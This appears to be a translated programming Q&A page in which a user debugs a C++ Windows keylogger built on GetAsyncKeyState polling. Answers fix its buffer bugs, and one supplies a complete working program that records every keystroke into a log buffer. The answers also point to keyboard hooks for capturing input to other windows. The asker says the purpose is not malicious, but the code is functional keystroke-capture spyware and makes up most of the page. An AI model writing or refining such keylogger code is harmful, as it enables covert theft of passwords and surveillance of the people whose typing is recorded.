键盘记录器返回所有值

【问题标题】:keylogger returns all values键盘记录器返回所有值
【发布时间】:2021-04-16 22:10:59
【问题描述】:

我正在设置键盘记录器,但不是出于恶意目的。

每当我在应用switch 语句以捕获特定的虚拟键代码后按下一个键时,我的缓冲区就会被我过滤的每个数字、字母、符号等完全填满。似乎,出于某种原因,每当我按下一个键时,所有switch 语句的cases 都会被击中。我如何解决它?下面是一个屏幕截图,让您可以直观地看到问题:

文件:main.cpp

while(true)
{
    char key;
    for (key = 8; key <= 255; key++)
    {
        Api._Sleep(20);

        char _log[MAX_PATH];
            
        KL::Log(key, _log);
            
        Api._lstrcatA(_log, &key);
        int len = Api._lstrlenA(_log);
        if(len == MAX_PATH)
        {
            //dump routine
            memset(_log, 0, sizeof(_log));
        }
    }  
}

文件:keylogger.cpp

void KL::Log(char key, char* logvar)
{
    if (GetAsyncKeyState(key) == -32767)
    {
        bool shift_down = GetAsyncKeyState(VK_SHIFT);
        switch (key)
        {
            case 0x08: logvar[lstrlenA(logvar) - 1] = '\0';
                break;
            case 0x09: lstrcatA(logvar, "[TAB]");
                break;
            case 0x0D: lstrcatA(logvar, "[NEWLINE]");
                break;
            case 0x13: lstrcatA(logvar, "[PAUSE]");
                break;
            case 0x14: lstrcatA(logvar, "[CAPS LOCK]");
                break;
            case 0x20: lstrcatA(logvar, " ");
                break;
            case 0x25: lstrcatA(logvar, "[LARROW]");
                break;
            case 0x26: lstrcatA(logvar, "[UPARROW]");
                break;
            case 0x27: lstrcatA(logvar, "[RARROW]");
                break;
            case 0x28: lstrcatA(logvar, "[DARROW]");
                break;
            case 0x2E: lstrcatA(logvar, "[DELETE]");
                break;
            case 0x30: (!shift_down) ? lstrcatA(logvar, "0") : lstrcatA(logvar, ")");
                break;
            case 0x31: (!shift_down) ? lstrcatA(logvar, "1") : lstrcatA(logvar, "!");
                break;
            case 0x32: (!shift_down) ? lstrcatA(logvar, "2") : lstrcatA(logvar, "@");
                break;
            case 0x33: (!shift_down) ? lstrcatA(logvar, "3") : lstrcatA(logvar, "#");
                break;
            case 0x34: (!shift_down) ? lstrcatA(logvar, "4") : lstrcatA(logvar, "$");
                break;
            case 0x35: (!shift_down) ? lstrcatA(logvar, "5") : lstrcatA(logvar, "%");
                break;
            case 0x36: (!shift_down) ? lstrcatA(logvar, "6") : lstrcatA(logvar, "^");
                break;
            case 0x37: (!shift_down) ? lstrcatA(logvar, "7") : lstrcatA(logvar, "&");
                break;
            case 0x38: (!shift_down) ? lstrcatA(logvar, "8") : lstrcatA(logvar, "*");
                break;
            case 0x39: (!shift_down) ? lstrcatA(logvar, "9") : lstrcatA(logvar, "(");
                break;
            case 0x41: (!shift_down) ? lstrcatA(logvar, "a") : lstrcatA(logvar, "A");
                break;
            case 0x42: (!shift_down) ? lstrcatA(logvar, "b") : lstrcatA(logvar, "B");
                break;
            case 0x43: (!shift_down) ? lstrcatA(logvar, "c") : lstrcatA(logvar, "C");
                break;
            case 0x44: (!shift_down) ? lstrcatA(logvar, "d") : lstrcatA(logvar, "D");
                break;
            case 0x45: (!shift_down) ? lstrcatA(logvar, "e") : lstrcatA(logvar, "E");
                break;
            case 0x46: (!shift_down) ? lstrcatA(logvar, "f") : lstrcatA(logvar, "F");
                break;
            case 0x47: (!shift_down) ? lstrcatA(logvar, "g") : lstrcatA(logvar, "G");
                break;
            case 0x48: (!shift_down) ? lstrcatA(logvar, "h") : lstrcatA(logvar, "H");
                break;
            case 0x49: (!shift_down) ? lstrcatA(logvar, "i") : lstrcatA(logvar, "I");
                break;
            case 0x4A: (!shift_down) ? lstrcatA(logvar, "j") : lstrcatA(logvar, "J");
                break;
            case 0x4B: (!shift_down) ? lstrcatA(logvar, "k") : lstrcatA(logvar, "K");
                break;
            case 0x4C: (!shift_down) ? lstrcatA(logvar, "l") : lstrcatA(logvar, "L");
                break;
            case 0x4D: (!shift_down) ? lstrcatA(logvar, "m") : lstrcatA(logvar, "M");
                break;
            case 0x4E: (!shift_down) ? lstrcatA(logvar, "n") : lstrcatA(logvar, "N");
                break;
            case 0x4F: (!shift_down) ? lstrcatA(logvar, "o") : lstrcatA(logvar, "O");
                break;
            case 0x50: (!shift_down) ? lstrcatA(logvar, "p") : lstrcatA(logvar, "P");
                break;
            case 0x51: (!shift_down) ? lstrcatA(logvar, "q") : lstrcatA(logvar, "Q");
                break;
            case 0x52: (!shift_down) ? lstrcatA(logvar, "r") : lstrcatA(logvar, "R");
                break;
            case 0x53: (!shift_down) ? lstrcatA(logvar, "s") : lstrcatA(logvar, "S");
                break;
            case 0x54: (!shift_down) ? lstrcatA(logvar, "t") : lstrcatA(logvar, "T");
                break;
            case 0x55: (!shift_down) ? lstrcatA(logvar, "u") : lstrcatA(logvar, "U");
                break;
            case 0x56: (!shift_down) ? lstrcatA(logvar, "v") : lstrcatA(logvar, "V");
                break;
            case 0x57: (!shift_down) ? lstrcatA(logvar, "w") : lstrcatA(logvar, "W");
                break;
            case 0x58: (!shift_down) ? lstrcatA(logvar, "x") : lstrcatA(logvar, "X");
                break;
            case 0x59: (!shift_down) ? lstrcatA(logvar, "y") : lstrcatA(logvar, "Y");
                break;
            case 0x5A: (!shift_down) ? lstrcatA(logvar, "z") : lstrcatA(logvar, "Z");
                break;
            case 0x60: (!shift_down) ? lstrcatA(logvar, "0") : lstrcatA(logvar, "0");
                break;
            case 0x61: (!shift_down) ? lstrcatA(logvar, "1") : lstrcatA(logvar, "1");
                break;
            case 0x62: (!shift_down) ? lstrcatA(logvar, "2") : lstrcatA(logvar, "2");
                break;
            case 0x63: (!shift_down) ? lstrcatA(logvar, "3") : lstrcatA(logvar, "3");
                break;
            case 0x64: (!shift_down) ? lstrcatA(logvar, "4") : lstrcatA(logvar, "4");
                break;
            case 0x65: (!shift_down) ? lstrcatA(logvar, "5") : lstrcatA(logvar, "5");
                break;
            case 0x66: (!shift_down) ? lstrcatA(logvar, "6") : lstrcatA(logvar, "6");
                break;
            case 0x67: (!shift_down) ? lstrcatA(logvar, "7") : lstrcatA(logvar, "7");
                break;
            case 0x68: (!shift_down) ? lstrcatA(logvar, "8") : lstrcatA(logvar, "8");
                break;
            case 0x69: (!shift_down) ? lstrcatA(logvar, "9") : lstrcatA(logvar, "9");
                break;
            case 0x6A: (!shift_down) ? lstrcatA(logvar, "*") : lstrcatA(logvar, "*");
                break;
            case 0x6B: (!shift_down) ? lstrcatA(logvar, "+") : lstrcatA(logvar, "+");
                break;
            case 0x6D: (!shift_down) ? lstrcatA(logvar, "-") : lstrcatA(logvar, "-");
                break;
            case 0x6E: (!shift_down) ? lstrcatA(logvar, ".") : lstrcatA(logvar, ".");
                break;
            case 0x6F: (!shift_down) ? lstrcatA(logvar, "/") : lstrcatA(logvar, "/");
                break;
            case 0xBA: (!shift_down) ? lstrcatA(logvar, ";") : lstrcatA(logvar, ":");
                break;
            case 0xBB: (!shift_down) ? lstrcatA(logvar, "=") : lstrcatA(logvar, "+");
                break;
            case 0xBC: (!shift_down) ? lstrcatA(logvar, ",") : lstrcatA(logvar, "<");
                break;
            case 0xBD: (!shift_down) ? lstrcatA(logvar, "-") : lstrcatA(logvar, "_");
                break;
            case 0xBE: (!shift_down) ? lstrcatA(logvar, ".") : lstrcatA(logvar, ">");
                break;
            case 0xBF: (!shift_down) ? lstrcatA(logvar, "/") : lstrcatA(logvar, "?");
                break;
            case 0xC0: (!shift_down) ? lstrcatA(logvar, "`") : lstrcatA(logvar, "~");
                break;
            case 0xDB: (!shift_down) ? lstrcatA(logvar, "[") : lstrcatA(logvar, "{");
                break;
            case 0xDC: (!shift_down) ? lstrcatA(logvar, "\\") : lstrcatA(logvar, "|");
                break;
            case 0xDD: (!shift_down) ? lstrcatA(logvar, "]") : lstrcatA(logvar, "}");
                break;
            case 0xDE: (!shift_down) ? lstrcatA(logvar, "'") : lstrcatA(logvar, "\"");
                break;
        }
    }
}

【问题讨论】:

  • 太多未知数无法确定,但看起来 _log 并没有被空终止。
  • &amp;key 不是以 null 结尾的字符串,因此 Api._lstrcatA(_log, &amp;key); 将不起作用。您需要改用char buf[2] = {key, '\0'}; Api._lstrcatA(_log, buf);
  • @RemyLebeau 我做到了,我仍然得到相同的输出:/
  • @pillpopper228 我没有说它会修复你的输出,只是说这是一个错误。
  • 您为什么只检查GetAsyncKeyState()-32767?你知道那代表什么,不是吗?您是否阅读过文档,其中说:“严格保留返回值的最低有效位的行为是为了与 16 位 Windows 应用程序(非抢占式)兼容,不应依赖它。" 如果您真的想检测按键,则根本不应该轮询按键。通过SetWindowsHookEx()RegisterRawInputDevices() 使用键盘挂钩,让挂钩通知您每次按键。

标签: c++ winapi keylogger


【解决方案1】:

_log 在循环的每次迭代中都会重新声明。所以每个strcat 操作都会覆盖之前的任何内容。但这没有实际意义,因为 _log 也没有初始化为空字符串。我猜你的意思是将_log 声明为类成员变量而不是局部变量。

改变这个:

while(true)
{
    char key;
    for (key = 8; key <= 255; key++)
    {
        Api._Sleep(20);

        char _log[MAX_PATH];
        
        KL::Log(key, _log);
        
        Api._lstrcatA(_log, &key);
        int len = Api._lstrlenA(_log);
        if(len == MAX_PATH)
        {
            //dump routine
            memset(_log, 0, sizeof(_log));
        }
    }  
}

到这里:

char _log[MAX_PATH] = {0}; // zero-init
// OR THIS if _log is a class variable: 
// memset(_log, '\0', sizeof(_log));

while(true)
{
    char key;
    for (key = 8; key <= 255; key++)
    {
        Api._Sleep(20);

       
        KL::Log(key, _log);
        
        Api._lstrcatA(_log, &key);
        int len = Api._lstrlenA(_log);
        if(len == MAX_PATH)
        {
            //dump routine
            memset(_log, 0, sizeof(_log));
        }
    }  
}

不知道为什么在每次循环迭代中间都有一个 20 毫秒的睡眠语句。

【讨论】:

  • 我做了 sleep(20) 因为它大大降低了 cpu 使用率,但是我尝试了 null 终止 key 并且没有任何改变,即使我将 _log 放在 while true 循环之外,我仍然得到相同的结果带有奇怪符号的消息框,包括所有字母数字等作为输出
  • 你已经显示了填充_log的代码,但实际显示它的代码在哪里?
【解决方案2】:

首先,您应该在 while 循环之外声明 _log(它可以是全局的或本地的,这取决于您的需要)。

那你不应该每次都用Api._lstrlenA(_log);key的值,这样会让你的_log记录下所有的值。

你不应该使用Api._Sleep(20);,因为这会影响键盘按下的判断。当按键被按下时,很有可能是当前key的值与按下的按键值不同,而 sleep 之后,程序就错过了按键。

这是修改后的示例,它对我有用:

#include <iostream>
#include <windows.h>
using namespace std;
void Log(char key, char* logvar)
{
    if (GetAsyncKeyState(key) & 0x01)
    {
        bool shift_down = GetAsyncKeyState(VK_SHIFT);
        switch (key)
        {
        case 0x08: logvar[lstrlenA(logvar) - 1] = '\0';
            break;
        case 0x09: lstrcatA(logvar, "[TAB]");
            break;
        case 0x0D: lstrcatA(logvar, "[NEWLINE]");
            break;
        case 0x13: lstrcatA(logvar, "[PAUSE]");
            break;
        case 0x14: lstrcatA(logvar, "[CAPS LOCK]");
            break;
        case 0x20: lstrcatA(logvar, " ");
            break;
        case 0x25: lstrcatA(logvar, "[LARROW]");
            break;
        case 0x26: lstrcatA(logvar, "[UPARROW]");
            break;
        case 0x27: lstrcatA(logvar, "[RARROW]");
            break;
        case 0x28: lstrcatA(logvar, "[DARROW]");
            break;
        case 0x2E: lstrcatA(logvar, "[DELETE]");
            break;
        case 0x30: (!shift_down) ? lstrcatA(logvar, "0") : lstrcatA(logvar, ")");
            break;
        case 0x31: (!shift_down) ? lstrcatA(logvar, "1") : lstrcatA(logvar, "!");
            break;
        case 0x32: (!shift_down) ? lstrcatA(logvar, "2") : lstrcatA(logvar, "@");
            break;
        case 0x33: (!shift_down) ? lstrcatA(logvar, "3") : lstrcatA(logvar, "#");
            break;
        case 0x34: (!shift_down) ? lstrcatA(logvar, "4") : lstrcatA(logvar, "$");
            break;
        case 0x35: (!shift_down) ? lstrcatA(logvar, "5") : lstrcatA(logvar, "%");
            break;
        case 0x36: (!shift_down) ? lstrcatA(logvar, "6") : lstrcatA(logvar, "^");
            break;
        case 0x37: (!shift_down) ? lstrcatA(logvar, "7") : lstrcatA(logvar, "&");
            break;
        case 0x38: (!shift_down) ? lstrcatA(logvar, "8") : lstrcatA(logvar, "*");
            break;
        case 0x39: (!shift_down) ? lstrcatA(logvar, "9") : lstrcatA(logvar, "(");
            break;
        case 0x41: (!shift_down) ? lstrcatA(logvar, "a") : lstrcatA(logvar, "A");
            break;
        case 0x42: (!shift_down) ? lstrcatA(logvar, "b") : lstrcatA(logvar, "B");
            break;
        case 0x43: (!shift_down) ? lstrcatA(logvar, "c") : lstrcatA(logvar, "C");
            break;
        case 0x44: (!shift_down) ? lstrcatA(logvar, "d") : lstrcatA(logvar, "D");
            break;
        case 0x45: (!shift_down) ? lstrcatA(logvar, "e") : lstrcatA(logvar, "E");
            break;
        case 0x46: (!shift_down) ? lstrcatA(logvar, "f") : lstrcatA(logvar, "F");
            break;
        case 0x47: (!shift_down) ? lstrcatA(logvar, "g") : lstrcatA(logvar, "G");
            break;
        case 0x48: (!shift_down) ? lstrcatA(logvar, "h") : lstrcatA(logvar, "H");
            break;
        case 0x49: (!shift_down) ? lstrcatA(logvar, "i") : lstrcatA(logvar, "I");
            break;
        case 0x4A: (!shift_down) ? lstrcatA(logvar, "j") : lstrcatA(logvar, "J");
            break;
        case 0x4B: (!shift_down) ? lstrcatA(logvar, "k") : lstrcatA(logvar, "K");
            break;
        case 0x4C: (!shift_down) ? lstrcatA(logvar, "l") : lstrcatA(logvar, "L");
            break;
        case 0x4D: (!shift_down) ? lstrcatA(logvar, "m") : lstrcatA(logvar, "M");
            break;
        case 0x4E: (!shift_down) ? lstrcatA(logvar, "n") : lstrcatA(logvar, "N");
            break;
        case 0x4F: (!shift_down) ? lstrcatA(logvar, "o") : lstrcatA(logvar, "O");
            break;
        case 0x50: (!shift_down) ? lstrcatA(logvar, "p") : lstrcatA(logvar, "P");
            break;
        case 0x51: (!shift_down) ? lstrcatA(logvar, "q") : lstrcatA(logvar, "Q");
            break;
        case 0x52: (!shift_down) ? lstrcatA(logvar, "r") : lstrcatA(logvar, "R");
            break;
        case 0x53: (!shift_down) ? lstrcatA(logvar, "s") : lstrcatA(logvar, "S");
            break;
        case 0x54: (!shift_down) ? lstrcatA(logvar, "t") : lstrcatA(logvar, "T");
            break;
        case 0x55: (!shift_down) ? lstrcatA(logvar, "u") : lstrcatA(logvar, "U");
            break;
        case 0x56: (!shift_down) ? lstrcatA(logvar, "v") : lstrcatA(logvar, "V");
            break;
        case 0x57: (!shift_down) ? lstrcatA(logvar, "w") : lstrcatA(logvar, "W");
            break;
        case 0x58: (!shift_down) ? lstrcatA(logvar, "x") : lstrcatA(logvar, "X");
            break;
        case 0x59: (!shift_down) ? lstrcatA(logvar, "y") : lstrcatA(logvar, "Y");
            break;
        case 0x5A: (!shift_down) ? lstrcatA(logvar, "z") : lstrcatA(logvar, "Z");
            break;
        case 0x60: (!shift_down) ? lstrcatA(logvar, "0") : lstrcatA(logvar, "0");
            break;
        case 0x61: (!shift_down) ? lstrcatA(logvar, "1") : lstrcatA(logvar, "1");
            break;
        case 0x62: (!shift_down) ? lstrcatA(logvar, "2") : lstrcatA(logvar, "2");
            break;
        case 0x63: (!shift_down) ? lstrcatA(logvar, "3") : lstrcatA(logvar, "3");
            break;
        case 0x64: (!shift_down) ? lstrcatA(logvar, "4") : lstrcatA(logvar, "4");
            break;
        case 0x65: (!shift_down) ? lstrcatA(logvar, "5") : lstrcatA(logvar, "5");
            break;
        case 0x66: (!shift_down) ? lstrcatA(logvar, "6") : lstrcatA(logvar, "6");
            break;
        case 0x67: (!shift_down) ? lstrcatA(logvar, "7") : lstrcatA(logvar, "7");
            break;
        case 0x68: (!shift_down) ? lstrcatA(logvar, "8") : lstrcatA(logvar, "8");
            break;
        case 0x69: (!shift_down) ? lstrcatA(logvar, "9") : lstrcatA(logvar, "9");
            break;
        case 0x6A: (!shift_down) ? lstrcatA(logvar, "*") : lstrcatA(logvar, "*");
            break;
        case 0x6B: (!shift_down) ? lstrcatA(logvar, "+") : lstrcatA(logvar, "+");
            break;
        case 0x6D: (!shift_down) ? lstrcatA(logvar, "-") : lstrcatA(logvar, "-");
            break;
        case 0x6E: (!shift_down) ? lstrcatA(logvar, ".") : lstrcatA(logvar, ".");
            break;
        case 0x6F: (!shift_down) ? lstrcatA(logvar, "/") : lstrcatA(logvar, "/");
            break;
        case 0xBA: (!shift_down) ? lstrcatA(logvar, ";") : lstrcatA(logvar, ":");
            break;
        case 0xBB: (!shift_down) ? lstrcatA(logvar, "=") : lstrcatA(logvar, "+");
            break;
        case 0xBC: (!shift_down) ? lstrcatA(logvar, ",") : lstrcatA(logvar, "<");
            break;
        case 0xBD: (!shift_down) ? lstrcatA(logvar, "-") : lstrcatA(logvar, "_");
            break;
        case 0xBE: (!shift_down) ? lstrcatA(logvar, ".") : lstrcatA(logvar, ">");
            break;
        case 0xBF: (!shift_down) ? lstrcatA(logvar, "/") : lstrcatA(logvar, "?");
            break;
        case 0xC0: (!shift_down) ? lstrcatA(logvar, "`") : lstrcatA(logvar, "~");
            break;
        case 0xDB: (!shift_down) ? lstrcatA(logvar, "[") : lstrcatA(logvar, "{");
            break;
        case 0xDC: (!shift_down) ? lstrcatA(logvar, "\\") : lstrcatA(logvar, "|");
            break;
        case 0xDD: (!shift_down) ? lstrcatA(logvar, "]") : lstrcatA(logvar, "}");
            break;
        case 0xDE: (!shift_down) ? lstrcatA(logvar, "'") : lstrcatA(logvar, "\"");
            break;
        }
    }
}
int main(int argc, const char* argv[])
{
    char _log[MAX_PATH]{};
    while (true)
    {
        char key;
        for (key = 8; key <= 255; key++)
        {
            //Sleep(20);
            Log(key, _log);
            //char buf[2] = { key, '\0' };
            //lstrcatA(_log, buf);
            int len = lstrlenA(_log);
            if (len == MAX_PATH)
            {
                //dump routine
                memset(_log, 0, sizeof(_log));
            }
        }
    }
    return 0;
}

当然,这会导致你提到的CPU占用问题,所以建议你使用SetWindowsHook来实现key logging。

你可以参考这个帖子:C++/Win32: Keyboard input to a non-foreground window

【讨论】:

    猜你喜欢
    • 1970-01-01
    • 2012-04-23
    • 2021-12-20
    • 2020-09-15
    • 1970-01-01
    • 1970-01-01
    • 2019-05-26
    • 1970-01-01
    • 1970-01-01
    相关资源
    最近更新 更多
    热门标签
    Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode